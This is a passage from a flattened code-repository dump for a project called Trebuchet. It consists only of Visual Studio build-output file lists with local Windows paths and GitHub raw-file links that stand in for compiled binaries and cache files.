C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.exe 16 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.pdb 17 | -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Trebuchet.csproj.GenerateResource.Cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Trebuchet.csproj.GenerateResource.Cache -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Trebuchet.csprojResolveAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Trebuchet.csprojResolveAssemblyReference.cache -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Trebuchet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Trebuchet.exe -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Trebuchet.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Trebuchet.pdb -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/build.force: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/build.force -------------------------------------------------------------------------------- /Trebuchet/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Trebuchet/obj/Release/TempPE/Properties.Resources.Designer.cs.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/TempPE/Properties.Resources.Designer.cs.dll -------------------------------------------------------------------------------- /Trebuchet/obj/Release/Trebuchet.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/Trebuchet.Properties.Resources.resources -------------------------------------------------------------------------------- /Trebuchet/obj/Release/Trebuchet.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Release\Trebuchet.csprojResolveAssemblyReference.cache 2 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Release\Trebuchet.csproj.GenerateResource.Cache 3 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Release\Trebuchet.Properties.Resources.resources 4 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\bin\Release\Trebuchet.exe 5 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\bin\Release\Trebuchet.pdb 6 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\bin\Release\Microsoft.VisualStudio.OLE.Interop.dll 7 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Release\Trebuchet.exe 8 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\poc\src\Trebuchet\obj\Release\Trebuchet.pdb 9 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\obj\Release\Trebuchet.exe 10 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\obj\Release\Trebuchet.pdb 11 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\bin\Release\Trebuchet.exe 12 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\bin\Release\Trebuchet.pdb 13 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\bin\Release\Microsoft.VisualStudio.OLE.Interop.dll 14 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\obj\Release\Trebuchet.csprojResolveAssemblyReference.cache 15 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\obj\Release\Trebuchet.Properties.Resources.resources 16 | C:\Users\Nick\ownCloud\Nick\PoC\google-security-research\Trebuchet\Trebuchet\obj\Release\Trebuchet.csproj.GenerateResource.Cache 17 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\obj\Release\Trebuchet.exe 18 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\obj\Release\Trebuchet.pdb 19 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\bin\Release\Trebuchet.exe 20 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\bin\Release\Trebuchet.pdb 21 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\bin\Release\Microsoft.VisualStudio.OLE.Interop.dll 22 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\obj\Release\Trebuchet.csprojResolveAssemblyReference.cache 23 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\obj\Release\Trebuchet.Properties.Resources.resources 24 | C:\Users\Nick\ownCloud\Nick\Trebuchet\Trebuchet\obj\Release\Trebuchet.csproj.GenerateResource.Cache 25 | -------------------------------------------------------------------------------- /Trebuchet/obj/Release/Trebuchet.csproj.GenerateResource.Cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/Trebuchet.csproj.GenerateResource.Cache -------------------------------------------------------------------------------- /Trebuchet/obj/Release/Trebuchet.csprojResolveAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/Trebuchet.csprojResolveAssemblyReference.cache -------------------------------------------------------------------------------- /Trebuchet/obj/Release/Trebuchet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/Trebuchet.exe -------------------------------------------------------------------------------- /Trebuchet/obj/Release/Trebuchet.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Release/Trebuchet.pdb -------------------------------------------------------------------------------- /Trebuchet/request.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/request.bin --------------------------------------------------------------------------------